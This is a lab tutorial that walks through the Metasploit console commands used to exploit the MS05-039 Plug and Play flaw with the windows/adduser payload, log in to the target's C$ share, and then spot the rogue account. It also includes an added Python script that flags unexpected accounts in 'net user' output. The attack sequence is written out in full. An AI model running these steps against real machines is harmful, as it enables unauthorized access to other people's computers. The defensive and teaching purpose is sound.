It is a great tool and it can be downloaded from:
http://www.metasploit.com/
The best thing is that it is available to everyone for free.
It is very easy to use, and I am going to show you how.
Scenario:
** I am demonstrating this in my security lab
** The attacker computer will be 192.168.1.9 (Linux Backtrack 4)
** The slave computer will be 192.168.1.10
First of all, open up Metasploit.
This is the Metasploit interface, ready for you to enter commands.
The first command to enter at the console is
** show exploits
Basically, this command lists all the exploits that the attacker can use.
Press ENTER and all the exploits will be shown to the attacker.
Now the attacker is going to choose an exploit.
In this case, the attacker will use the ms05_039_pnp exploit.
The command to select the exploit is
** use ms05_039_pnp
Press ENTER and the exploit will be selected.
Now we are going to see what the exploit can do for the attacker.
The attacker will now issue this command
** show payloads
Press ENTER and all the payloads will be shown to the attacker.
In this case, the attacker is going to add a user to the slave computer.
The command to issue is
** set payload windows/adduser
Press ENTER and that payload will be used.
The next thing the attacker needs to do is set the target.
The attacker now needs to issue this command to see the target list
** show targets
After the attacker has determined the target, the next step is to set it.
The command is
** set target 0
The number depends on the slave's operating system.
The next step is to show the fields that the attacker needs to fill in.
The command is
** show options
There will be empty fields that need to be filled in by the attacker.
In this case, the empty fields are RHOST and PASS.
RHOST stands for Remote Host (the slave's IP address).
PASS stands for Password (the password of the account the payload will create).
To set both of them, the commands are
** set RHOST 192.168.1.10
** set PASS 12345
The attacker is setting the remote host.
The attacker is setting the password.
Finally, the last command that needs to be used is
** exploit
The exploit command tells Metasploit to launch the attack against the slave.
Press ENTER and Metasploit will launch the attack.
Now the attacker knows that he has an account on the slave machine.
Account information:
username = Metasploit
password = 12345
Now it is time for the attacker to enter the slave machine.
The attacker will open up a RUN box.
In the RUN box, the attacker will type in
** \\192.168.1.10\c$
Press ENTER and a login prompt will pop up.
The attacker needs to enter the username and password for the slave machine.
In this case, the username and password are Metasploit and 12345.
Press ENTER and the attacker is in the slave machine.
The above picture shows that the attacker is in the C drive of the slave machine.
What can the slave see on his machine?
If the slave launches a Command Prompt and types in
** net user
The result will be
Do you see that?
The username "metasploit" is there.
That is the username that the attacker created.
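The `net user` check above is something the owner of the machine can automate. As an added example that is not part of the original tutorial, the Python script below parses the text that `net user` prints and reports any local account that is missing from a known-good baseline, which is exactly how the "Metasploit" account created by the windows/adduser payload would stand out. The sample output, the host name SLAVE-PC and the baseline account list are constructed for the example.

```python
"""Detect unexpected local accounts from `net user` output.

Added example (not part of the original tutorial): a defender-side check
that parses the text printed by `net user` and flags any account that is
not in a known-good baseline, such as the "Metasploit" account created by
the windows/adduser payload.
"""
from typing import List, Set

# Constructed sample of `net user` output from the slave machine after the
# attack. The layout (header, dashed rule, 25-character columns, footer)
# follows what XP-era `net user` prints; host name and accounts are made up.
SAMPLE_NET_USER_OUTPUT = """\
User accounts for \\\\SLAVE-PC

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
Metasploit               SUPPORT_388945a0         User
The command completed successfully.
"""

# Accounts the owner expects on this machine (assumed baseline; the real one
# should be recorded while the machine is known to be clean).
BASELINE_ACCOUNTS: Set[str] = {
    "Administrator", "Guest", "HelpAssistant", "SUPPORT_388945a0", "User",
}

COLUMN_WIDTH = 25  # `net user` prints names in fixed-width columns


def parse_net_user(output: str) -> List[str]:
    """Return the account names listed in `net user` output, in print order."""
    accounts: List[str] = []
    in_table = False
    for line in output.splitlines():
        if line.startswith("----"):
            in_table = True          # the dashed rule precedes the account table
            continue
        if not in_table:
            continue                 # skip the header lines above the rule
        if line.startswith("The command completed"):
            break                    # footer ends the table
        # Slice fixed-width columns so names containing spaces survive intact.
        for start in range(0, len(line), COLUMN_WIDTH):
            name = line[start:start + COLUMN_WIDTH].strip()
            if name:
                accounts.append(name)
    return accounts


def unexpected_accounts(output: str, baseline: Set[str]) -> List[str]:
    """Accounts present in the output but absent from the baseline.

    Windows account names are case-insensitive, so compare in lower case;
    this catches "metasploit" as well as "Metasploit".
    """
    known = {name.lower() for name in baseline}
    return [name for name in parse_net_user(output) if name.lower() not in known]


if __name__ == "__main__":
    for name in unexpected_accounts(SAMPLE_NET_USER_OUTPUT, BASELINE_ACCOUNTS):
        print(f"ALERT: unexpected local account: {name}")
```

To use it on a real machine, save the command's output with `net user > users.txt`, read that file in place of the constructed sample, and keep the baseline list somewhere the machine's owner controls. An account that appears in the output but not in the baseline is a reason to check the machine, and a reason to install the missing patch before reconnecting it to the network.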
The commands that I used:
** show exploits
** use EXPLOITNAME
** show payloads
** set payload PAYLOADNAME
** show targets
** set target TARGETNUMBER
** show options
** set RHOST IPADDRESS
** exploit
Imagine that you are in a cafe drinking coffee and using your laptop.
The attacker is near you and attacks your computer.
The attacker can do anything he wants once he is in the C drive.
The solution is to patch your operating system with the latest security hot-fixes from the vendor.
I will end my tutorial here.
Hope you will like it and feel free to comment.